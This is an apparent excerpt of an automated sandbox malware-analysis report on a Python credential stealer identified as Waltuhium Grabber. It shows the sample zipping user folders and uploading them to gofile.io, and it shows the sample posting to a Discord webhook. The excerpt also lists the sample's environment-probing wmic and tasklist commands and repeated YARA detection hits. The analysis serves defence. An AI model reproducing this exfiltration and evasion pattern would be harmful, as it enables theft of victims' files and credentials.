                                                                                                                                                                                                                                            2024-11-12 23:39:02 UTC131OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 7a 69 70 2d 63 6f 6d 70 72 65 73 73 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 74 65 61 6c 65 64 46 69 6c 65 73 42 79 57 61 6c 74 75 68 69 75 6d 2e 7a 69 70 22 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: Content-Type: application/x-zip-compressedContent-Disposition: form-data; name="file"; filename="StealedFilesByWaltuhium.zip"
                                                                                                                                                                                                                                            2024-11-12 23:39:02 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 dc 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 44 54 42 5a 47 49 4f 4f 53 4f 2f 50 4b 03 04 14 00 00 00 00 00 dc 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 44 65 73 6b 74 6f 70 2f 50 4b 03 04 14 00 00 00 00 00 dd 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 63 75 6d 65 6e 74 73 2f 50 4b 03 04 14 00 00 00 00 00 dd 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 77 6e 6c 6f 61 64 73 2f 50 4b 03 04 14 00 00 00 00 00 dd 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 4f 4e 42 51 43 4c 59 53 50 55 2f 50 4b 03 04 14 00 00 00 00 00 dc 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 55 4d 4d 42 44 4e 45 51 42 4e 2f 50 4b 03 04 14 00 00 00 00 00 dc 94 6c 59
                                                                                                                                                                                                                                            Data Ascii: PKlYDTBZGIOOSO/PKlYDesktop/PKlYDocuments/PKlYDownloads/PKlYONBQCLYSPU/PKlYUMMBDNEQBN/PKlY
2024-11-12 23:39:02 UTC | 2 | OUT | Data Raw: 0d 0a
Data Ascii:
2024-11-12 23:39:02 UTC | 38 | OUT | Data Raw: 2d 2d 61 32 61 61 37 36 36 62 30 63 66 62 34 38 30 39 39 34 32 31 62 63 30 66 36 30 39 62 30 39 33 64 2d 2d 0d 0a
Data Ascii: --a2aa766b0cfb48099421bc0f609b093d--
2024-11-12 23:39:03 UTC | 449 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.27.1
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:39:03 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 443
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                                                            Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                                                                                                            2024-11-12 23:39:03 UTC443INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 31 34 35 34 37 34 33 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 39 78 37 30 6e 71 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 35 59 47 43 42 39 35 37 58 6a 58 4e 39 72 66 44 56 54 6e 6d 33 63 71 69 58 39 7a 59 77 6e 34 30 22 2c 22 69 64 22 3a 22 64 36 65 30 61 38 30 66 2d 62 30 64 62 2d 34 63 36 37 2d 61 32 37 66 2d 63 61 31 34 31 65 38 63 33 32 61 62 22 2c 22 6d 64 35 22 3a 22 32 64 65 33 39 30 35 62 33 63 37 39 63 33 65 64 64 66 34 33 36 34 65 66 39 38 61 65 33 36 34 61 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 31 34 35
                                                                                                                                                                                                                                            Data Ascii: {"data":{"createTime":1731454743,"downloadPage":"https://gofile.io/d/9x70nq","guestToken":"5YGCB957XjXN9rfDVTnm3cqiX9zYwn40","id":"d6e0a80f-b0db-4c67-a27f-ca141e8c32ab","md5":"2de3905b3c79c3eddf4364ef98ae364a","mimetype":"application/zip","modTime":173145


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49762 | 162.159.128.233 | 443 | 6500 | C:\Users\user\Desktop\dens.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 23:39:04 UTC | 281 | OUT | POST /api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyygbrLTztN99jPEX8IcFYc7T HTTP/1.1
                                                                                                                                                                                                                                            Host: discord.com
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            Content-Length: 345
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            2024-11-12 23:39:04 UTC345OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 77 61 6c 74 75 68 69 75 6d 20 7c 20 74 2e 6d 65 2f 77 61 6c 74 75 68 69 75 6d 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 57 61 6c 74 75 68 69 75 6d 20 47 72 61 62 62 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 47 72 61 62 62 65 64 20 46 69 6c 65 73 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 77 61 6c 74 75 68 69 75 6d 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 67 69 74 68 75 62 22 7d 2c 20 22 74 68 75 6d 62 6e 61 69 6c 22 3a 20 7b 22 75 72 6c 22 3a 20 22 77 65 62 68 6f 6f 6b 22 7d 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22
                                                                                                                                                                                                                                            Data Ascii: {"username": "waltuhium | t.me/waltuhium", "embeds": [{"title": "***Waltuhium Grabber***", "description": "***Grabbed Files***", "url": "https://t.me/waltuhium", "color": 0, "footer": {"text": "github"}, "thumbnail": {"url": "webhook"}, "fields": [{"name"
2024-11-12 23:39:04 UTC | 1251 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:39:04 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                                            x-ratelimit-reset: 1731454746
                                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ulokEnWGzVdH7hLe7hM6A2vOqkNcE0KE1y65WVc8ZvDwIjhqZcZpQbKPvQF8sheBErrWD8hb%2BJuFHZ01kC0lCIIzTD16gbov3KB0pVTsuTd6CvzTlRvcpVS1Jqp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            Set-Cookie: __cfruid=61c4ad02f8e425b2213084f6302794d3bd4541dd-1731454744; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                            Set-Cookie: _cfuvid=tkSDV4PM1uOJpB7hv3ajc8RXfDe2eEs5RpUxYl09GBk-1731454744647-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8e1a5bf99b60d5db-DFW
2024-11-12 23:39:04 UTC 45 IN
                                                                                                                                                                                                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Target ID: 0
Start time: 18:38:27
Start date: 12/11/2024
Path: C:\Users\user\Desktop\dens.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\dens.exe"
Imagebase: 0x7ff62c0f0000
File size: 16'905'542 bytes
MD5 hash: 258322C37F4F5C632BD6C79520899603
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 18:38:30
Start date: 12/11/2024
Path: C:\Users\user\Desktop\dens.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\dens.exe"
Imagebase: 0x7ff62c0f0000
File size: 16'905'542 bytes
MD5 hash: 258322C37F4F5C632BD6C79520899603
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "gdb --version"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x800000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

Target ID:9
Start time:18:38:31
Start date:12/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:18:38:32
Start date:12/11/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist
Imagebase:0x7ff6187b0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:11
Start time:18:38:32
Start date:12/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic computersystem get Manufacturer
Imagebase:0x7ff6e2c90000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:12
Start time:18:38:32
Start date:12/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path win32_VideoController get name
Imagebase:0x7ff6e2c90000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:18:38:33
Start date:12/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
Imagebase:0x7ff799bb0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:18:38:33
Start date:12/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:18:38:33
Start date:12/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic path Win32_ComputerSystem get Manufacturer
Imagebase:0x7ff6e2c90000
